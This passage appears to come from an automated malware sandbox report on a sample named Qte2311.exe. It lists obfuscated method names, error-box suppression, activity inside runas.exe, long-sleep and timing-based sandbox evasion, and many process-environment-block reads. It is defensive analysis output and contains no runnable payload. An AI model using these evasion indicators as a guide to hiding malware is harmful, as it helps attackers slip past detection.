Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: Yara match File source: Process Memory Space: Qte2311.exe PID: 7420, type: MEMORYSTR
Source: C:\Users\user\Desktop\Qte2311.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep count: 243 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep time: -486000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep count: 9727 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe TID: 7712 Thread sleep time: -19454000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\jFJKUzqwKIBdWDkcySLyDBhTBgNTKdOJMfgYJclsrVfAJDMiwJDDVHpOzszTWBY\SoZyKEDyfEWrMWEFcBvwSAkabc.exe TID: 7776 Thread sleep time: -65000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188096E rdtsc 3_2_0188096E
Source: C:\Users\user\Desktop\Qte2311.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Window / User API: threadDelayed 9727 Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe API coverage: 1.3 %
Source: C:\Windows\SysWOW64\runas.exe API coverage: 2.9 %
Source: C:\Users\user\Desktop\Qte2311.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FABB80 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FABB80
Source: C:\Users\user\Desktop\Qte2311.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: runas.exe, 00000005.00000002.4113575754.0000000007D38000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4110106920.00000000033FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110438213.00000000007DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0188096E rdtsc 3_2_0188096E
Source: C:\Users\user\Desktop\Qte2311.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h] 3_2_018FC188
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FC188 mov eax, dword ptr fs:[00000030h] 3_2_018FC188
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01880185 mov eax, dword ptr fs:[00000030h] 3_2_01880185
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h] 3_2_018E4180
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E4180 mov eax, dword ptr fs:[00000030h] 3_2_018E4180
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C019F mov eax, dword ptr fs:[00000030h] 3_2_018C019F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C019F mov eax, dword ptr fs:[00000030h] 3_2_018C019F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C019F mov eax, dword ptr fs:[00000030h] 3_2_018C019F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C019F mov eax, dword ptr fs:[00000030h] 3_2_018C019F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h] 3_2_0183A197
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h] 3_2_0183A197
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A197 mov eax, dword ptr fs:[00000030h] 3_2_0183A197
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h] 3_2_019061C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019061C3 mov eax, dword ptr fs:[00000030h] 3_2_019061C3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018BE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018BE1D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019161E5 mov eax, dword ptr fs:[00000030h] 3_2_019161E5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018701F8 mov eax, dword ptr fs:[00000030h] 3_2_018701F8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov eax, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EE10E mov ecx, dword ptr fs:[00000030h] 3_2_018EE10E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01900115 mov eax, dword ptr fs:[00000030h] 3_2_01900115
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov ecx, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 mov eax, dword ptr fs:[00000030h] 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01870124 mov eax, dword ptr fs:[00000030h] 3_2_01870124
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov ecx, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D4144 mov eax, dword ptr fs:[00000030h] 3_2_018D4144
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01846154 mov eax, dword ptr fs:[00000030h] 3_2_01846154
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01846154 mov eax, dword ptr fs:[00000030h] 3_2_01846154
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C156 mov eax, dword ptr fs:[00000030h] 3_2_0183C156
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D8158 mov eax, dword ptr fs:[00000030h] 3_2_018D8158
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01914164 mov eax, dword ptr fs:[00000030h] 3_2_01914164
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01914164 mov eax, dword ptr fs:[00000030h] 3_2_01914164
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184208A mov eax, dword ptr fs:[00000030h] 3_2_0184208A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018380A0 mov eax, dword ptr fs:[00000030h] 3_2_018380A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D80A8 mov eax, dword ptr fs:[00000030h] 3_2_018D80A8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019060B8 mov eax, dword ptr fs:[00000030h] 3_2_019060B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019060B8 mov ecx, dword ptr fs:[00000030h] 3_2_019060B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C20DE mov eax, dword ptr fs:[00000030h] 3_2_018C20DE
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_0183A0E3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C60E0 mov eax, dword ptr fs:[00000030h] 3_2_018C60E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018480E9 mov eax, dword ptr fs:[00000030h] 3_2_018480E9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C0F0 mov eax, dword ptr fs:[00000030h] 3_2_0183C0F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018820F0 mov ecx, dword ptr fs:[00000030h] 3_2_018820F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C4000 mov ecx, dword ptr fs:[00000030h] 3_2_018C4000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 mov eax, dword ptr fs:[00000030h] 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h] 3_2_0185E016
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h] 3_2_0185E016
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h] 3_2_0185E016
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E016 mov eax, dword ptr fs:[00000030h] 3_2_0185E016
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183A020 mov eax, dword ptr fs:[00000030h] 3_2_0183A020
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0183C020 mov eax, dword ptr fs:[00000030h] 3_2_0183C020
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D6030 mov eax, dword ptr fs:[00000030h] 3_2_018D6030
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01842050 mov eax, dword ptr fs:[00000030h] 3_2_01842050
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C6050 mov eax, dword ptr fs:[00000030h] 3_2_018C6050
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186C073 mov eax, dword ptr fs:[00000030h] 3_2_0186C073
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186438F mov eax, dword ptr fs:[00000030h]